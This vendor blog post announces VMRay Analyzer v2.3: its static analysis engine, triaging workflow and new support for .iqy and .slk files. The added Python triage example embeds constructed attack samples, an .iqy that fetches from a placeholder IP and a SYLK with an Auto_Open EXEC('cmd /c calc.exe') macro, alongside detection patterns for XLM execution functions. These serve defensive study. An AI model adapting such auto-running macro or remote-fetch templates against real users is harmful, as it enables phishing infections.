At the core of VMRay Analyzer is our dynamic analysis engine. Built on an agentless, hypervisor-based approach, it delivers high detection efficacy and strong evasion resistance. In Version 2.0, we added a rapid reputation engine that allows malware analysts and incident response (DFIR) professionals to quickly identify not only known threats but also known benign files and URLs. In our latest release (v2.3), we have continued to bolster performance with a static analysis engine, which complements the existing dynamic analysis and reputation engines and supports an even higher analysis throughput. In this blog post, we discuss the new static analysis engine and some of the other new features added in VMRay Analyzer v2.3.
Superior Performance with Static Analysis
Static analysis complements dynamic analysis in a number of ways. It is an extremely efficient analysis method: suspicious or malicious files can be flagged in a matter of seconds by extracting metadata and embedded objects and by deobfuscating active code such as MS Office macros. The performance and efficiency offered by static analysis are critical when a large number of files needs to be analyzed. Beyond performance, static analysis also enriches the malware analysis process in certain cases. As an example, an exploit that targets a specific application version may never trigger when the sample is detonated in an environment that does not match the one it was designed to attack, so dynamic analysis alone can miss it, whereas the exploit's structure is still visible to static inspection. Used together, static and dynamic analysis techniques provide a comprehensive platform for malware analysis.
VMRay Analyzer v2.3 incorporates a built-in static analysis engine for executables, MS Office and PDF files, which extracts:
- Embedded files and URLs
- Metadata such as PE imports/exports, compile time, document author, title, etc.
- Active code (Office macros, PDF JavaScript) and its trigger events, such as document open or button click
In addition, the static analysis engine performs basic MS Office macro deobfuscation.
VMRay Analyzer’s reputation engine and static analyzer complement its dynamic analysis engine by providing their own severity scores for a file.
Static Analysis Report
Static VTI (VMRay Threat Identifier) detection rules are applied to the analyzed file, and an individual static analysis report is presented to the user.
In addition, built-in (or user-defined) YARA rules are matched against the sample itself and against every embedded file and data object extracted by the static analysis. These rules flag:
- Exploits for known vulnerabilities
- Known malware signatures
- Other anomalies or suspicious patterns
A static analysis score on a scale of 0 to 100 is also assigned to the file, with 0 meaning that no rule matched and nothing suspicious was extracted.
Triaging for Improved Performance
Triaging allows users to optimize performance by defining the analysis workflow for a submitted file. As mentioned earlier, this allows for a higher throughput, i.e., a larger volume of analyses completed in a given amount of time.
In VMRay Analyzer v2.3, users can choose a number of workflow combinations involving reputation lookups, static analysis and dynamic analysis. The most comprehensive analysis workflow or ‘Analyzer Mode’ involves using all three techniques as shown in the figure below.
The following Analyzer Modes are available and can be configured in the web interface:
- Only perform reputation lookup
- Only perform static analysis
- Only perform reputation lookup and static analysis
- Only perform static analysis and dynamic analysis
- Perform reputation lookup, static analysis and dynamic analysis
Triaging stops the analyzer workflow as soon as a file is judged clean, i.e., if the reputation lookup returns a 'Whitelisted' verdict or if the static analysis score is 0/100; only files that pass both gates go on to dynamic analysis. The obvious benefit of triaging is performance: reputation and static analysis results are usually returned in a matter of seconds, so overall analysis throughput is significantly higher. The trade-off is coverage: in a triaging mode, a sample whose only indicators appear at runtime is not detonated, so the full three-stage mode remains the right choice when throughput is not the limiting factor. Given the amount of email and internet traffic that most organizations have to analyze today, the throughput gain is a very significant benefit.
Support for New File Types
In recent weeks, a new attack technique was uncovered in which malware authors used Excel Web Query (.iqy) file attachments to trick users into downloading and running malicious scripts via Excel. An .iqy file is a small plain-text file that instructs Excel to fetch content from a URL, so the attachment itself contains no code, only the address of the payload. Several spam campaigns disguised as 'Unpaid Invoice' alerts emerged in which attackers used this file type to bypass AVs and infect victims with a remote access trojan.
Another technique uncovered recently is the use of Symbolic Link (SYLK, .slk) files, a text-based spreadsheet format that can carry Excel 4.0 macro formulas, to infect computers.
VMRay Analyzer v2.3 adds analysis support for both the .iqy and .slk file types. We recently published an .iqy file analysis report along with details about the kill chain on Twitter.
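To make the triaging workflow and the two new file types concrete, here is an added example in Python. It is not VMRay code and does not reproduce the product's rules or scoring; the rule weights, the mode names, the allowlist and the sample .iqy/.slk files are all constructed for this illustration. It parses the two text formats, derives a 0..100 static score from what it finds, and runs the reputation, static and dynamic steps in the order a chosen mode dictates, stopping early on a 'whitelisted' verdict or a static score of 0, exactly as the triaging rule above describes.

```python
"""Static triage of .iqy and .slk attachments inside a short-circuiting workflow.
Added illustration, not VMRay code: weights, modes and samples are constructed."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
# Excel 4.0 (XLM) macro functions that hand control to the OS or load code.
XLM_EXEC_RE = re.compile(r"\b(EXEC|CALL|REGISTER|RUN|FORMULA)\s*\(", re.IGNORECASE)

# Constructed samples; the URL and command are placeholders, not campaign IOCs.
SAMPLE_IQY = b"WEB\r\n1\r\nhttp://203.0.113.10:8080/invoice.dat\r\n"
SAMPLE_SLK = (
    b"ID;PWXL;N;E\r\n"
    b"O;E\r\n"                       # options record: sheet is a macro sheet
    b"NN;NAuto_Open;ER1C1\r\n"       # defined name Auto_Open -> cell R1C1 runs on open
    b'C;X1;Y1;EEXEC("cmd /c calc.exe")\r\n'
    b"C;X1;Y2;EHALT()\r\n"
    b"E\r\n"
)
BENIGN_SLK = b'ID;PWXL;N;E\r\nC;X1;Y1;K"Q1 totals"\r\nC;X2;Y1;K1234\r\nE\r\n'


@dataclass
class StaticResult:
    file_type: str
    urls: List[str] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)
    score: Optional[int] = None      # 0..100 once rules ran; None = no verdict


def _finish(res: StaticResult, weights: List[int]) -> StaticResult:
    res.score = min(100, sum(weights))
    return res


def analyze_iqy(data: bytes) -> StaticResult:
    """An .iqy file is text: a WEB header, a version line, then the URL Excel
    fetches. The payload lives remotely, so the URL is the static indicator."""
    res = StaticResult("iqy")
    lines = [ln.strip() for ln in data.decode("latin-1").splitlines() if ln.strip()]
    if not lines or lines[0].upper() != "WEB":
        res.findings.append("missing WEB header: not a web query file")
        return res                   # no verdict; let later stages decide
    weights: List[int] = []
    for url in URL_RE.findall("\n".join(lines[1:])):
        res.urls.append(url)
        res.findings.append("fetches remote content from " + url)
        weights.append(50)
        if IPV4_RE.match(urlparse(url).hostname or ""):
            res.findings.append("URL host is a raw IP address")
            weights.append(20)
    return _finish(res, weights)


def analyze_slk(data: bytes) -> StaticResult:
    """SYLK is ';'-separated text records. A cell record (C) carries a formula
    in a field prefixed with E; a defined name (NN) called Auto_Open makes
    Excel evaluate that cell with no click. Escaped ';;' is not handled here."""
    res = StaticResult("slk")
    weights: List[int] = []
    for line in data.decode("latin-1").splitlines():
        fields = line.strip().split(";")
        rtype = fields[0]
        if rtype == "O" and "E" in fields[1:]:
            res.findings.append("options record marks the sheet as a macro sheet")
            weights.append(10)
        elif rtype == "NN":
            names = [f[1:] for f in fields[1:] if f.startswith("N")]
            if any(n.lower() in ("auto_open", "auto_close") for n in names):
                res.findings.append("defined name %s runs automatically" % names[0])
                weights.append(30)
        elif rtype == "C":
            for formula in (f[1:] for f in fields[1:] if f.startswith("E")):
                m = XLM_EXEC_RE.search(formula)
                if m:
                    res.findings.append("XLM %s() in cell formula: %s" % (m.group(1).upper(), formula))
                    weights.append(50)
                for url in URL_RE.findall(formula):
                    res.urls.append(url)
                    weights.append(10)
    return _finish(res, weights)


# Constructed reputation data: only the benign sample is on the allowlist.
ALLOWLIST = {hashlib.sha256(BENIGN_SLK).hexdigest()}
ANALYZERS = {"iqy": analyze_iqy, "slk": analyze_slk}
MODES = {                            # the five workflow combinations from the text
    "reputation": ("reputation",),
    "static": ("static",),
    "reputation+static": ("reputation", "static"),
    "static+dynamic": ("static", "dynamic"),
    "full": ("reputation", "static", "dynamic"),
}


def reputation_lookup(data: bytes) -> str:
    return "whitelisted" if hashlib.sha256(data).hexdigest() in ALLOWLIST else "unknown"


def triage(name: str, data: bytes, mode: str = "full") -> Dict:
    """Run the steps of the chosen mode in order and stop at the first clean
    verdict (whitelisted, or a static score of exactly 0)."""
    steps: List[str] = []
    report: Dict = {"steps": steps, "static": None, "verdict": "no verdict"}
    for step in MODES[mode]:
        steps.append(step)
        if step == "reputation":
            if reputation_lookup(data) == "whitelisted":
                report["verdict"] = "clean: whitelisted"
                break
        elif step == "static":
            ext = name.rsplit(".", 1)[-1].lower()
            if ext not in ANALYZERS:
                continue             # no static rules for this type, no verdict
            res = ANALYZERS[ext](data)
            report["static"] = res
            if res.score == 0:
                report["verdict"] = "clean: static score 0/100"
                break
            if res.score:
                report["verdict"] = "suspicious: static score %d/100" % res.score
        else:
            # Sandbox detonation is out of scope here; a real engine would run the
            # sample and replace this verdict with the dynamic result.
            report["verdict"] += " (queued for dynamic analysis)"
    return report
```

With the constructed samples, `triage("report.slk", BENIGN_SLK, "full")` stops after the reputation step, the same benign file submitted in static+dynamic mode stops after static analysis with a score of 0, and the macro-bearing .slk runs all three stages with a static score of 90. The deliberate design point is that an unsupported file type yields no score rather than 0, so triaging never short-circuits a file it could not actually inspect.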
Improved User Experience
In a recently published review of VMRay Analyzer, Matt Bromiley of the SANS Institute said:
“One of the most common issues that many incident responders encounter when incorporating a tool into their workflow is ease of use versus analytical capabilities. How they are balanced can determine whether an organization fully adopts a tool.”
An excellent user experience is vital for incident responders and DFIR specialists to be effective in their roles. We have continued to improve the user experience in v2.3 with the following changes:
Simplified Submission Process
When a file is submitted via the VMRay Analyzer 2.3 web interface, users can toggle between basic and advanced versions of the submission screen. The advanced screen offers several customization options such as network configuration, command line arguments, prescripts, analyzer mode and triaging mode. The simplified screen is clean and displays only the basic options: the environments in which the analysis should be performed, available external analyzers (if desired), tags and comments.
Account Manager Role for Cloud Customers
Cloud users designated as ‘Account Managers’ can now invite new users from their organization to join the VMRay Cloud service. Account managers can also enable/disable specific user accounts in their organization as appropriate.
Improved Email Notifications
Email notifications have been significantly improved in v2.3. After an analysis has been completed, a summary of the analysis results is emailed to the submitting user.
Additional Features
There are several other improvements baked into VMRay Analyzer v2.3. These include:
- Improved network analysis
- New and improved anti-evasion features
- New and improved VTI (VMRay Threat Identifier) detection rules
- Improved built-in YARA rulesets and additional sections in the analysis reports
For VMRay customers, a complete list of the new features is available in the product documentation.
Want to get hands-on with VMRay Analyzer v2.3? Click here to start your trial.